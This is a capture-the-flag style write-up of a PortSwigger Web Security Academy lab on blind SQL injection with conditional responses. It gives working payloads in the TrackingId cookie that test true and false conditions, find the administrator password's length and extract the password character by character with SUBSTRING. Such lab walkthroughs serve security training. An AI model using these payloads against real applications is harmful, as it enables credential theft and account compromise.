

Target: PortSwigger Web Security Academy
Lab: Blind SQL injection with conditional responses

Objective

The goal of this lab is to exploit a blind SQL injection vulnerability in the TrackingId cookie in order to retrieve the password of the administrator user and log in to the application.

The application does not directly display SQL query results, but the response changes depending on whether a SQL condition evaluates to true or false.

Step 1 — Identify the Injection Point

While browsing the application, intercept a request using Burp Suite.

Example request:

GET / HTTP/1.1
Host: LAB-ID.web-security-academy.net
Cookie: TrackingId=abc123; session=xyz456

Testing the cookie value reveals that the TrackingId parameter is vulnerable to SQL injection.

Test payload:

TrackingId=abc123' AND '1'='1

If the condition is true, the page shows:

"Welcome back!"

Now test a false condition:

TrackingId=abc123' AND '1'='2

The message disappears.

This confirms a Blind SQL Injection vulnerability based on conditional responses.

Step 2 — Confirm Database Interaction

To verify that the database query is being executed:

TrackingId=abc123' AND (SELECT 'a')='a

If the page still displays "Welcome back!", the query is executing successfully.

Step 3 — Determine Password Length

Next, determine the length of the administrator password.

Payload example:

TrackingId=abc123' AND (SELECT LENGTH(password) FROM users WHERE username='administrator')>10--

Adjust the number until the response changes.

Example discovery:

Password length = 20 characters

Step 4 — Extract Password Characters

Now extract the password character by character using SUBSTRING.

Example payload:

TrackingId=abc123' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'),1,1)='a--

If "Welcome back!" appears, the first character is a.

Repeat this process for each position.

Example:

Position 1 → a
Position 2 → d
Position 3 → m
Position 4 → i
Position 5 → n

Continue until the full password is extracted.

Step 5 — Login as Administrator

Once the full password is discovered:

Go to /login

Enter:

Username: administrator
Password: extracted_password

Successful login solves the lab.

Tools Used

Burp Suite Repeater
Burp Suite Intruder (optional for automation)

Key Takeaways

Blind SQL injection occurs when applications do not return query results but still reveal information through behavioral differences in responses.

Conditional responses allow attackers to infer database values by testing true/false conditions.

Example Payload Used

TrackingId=abc123' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'),1,1)='a--

Impact

An attacker could extract sensitive data such as user credentials from the database, potentially leading to full account compromise.
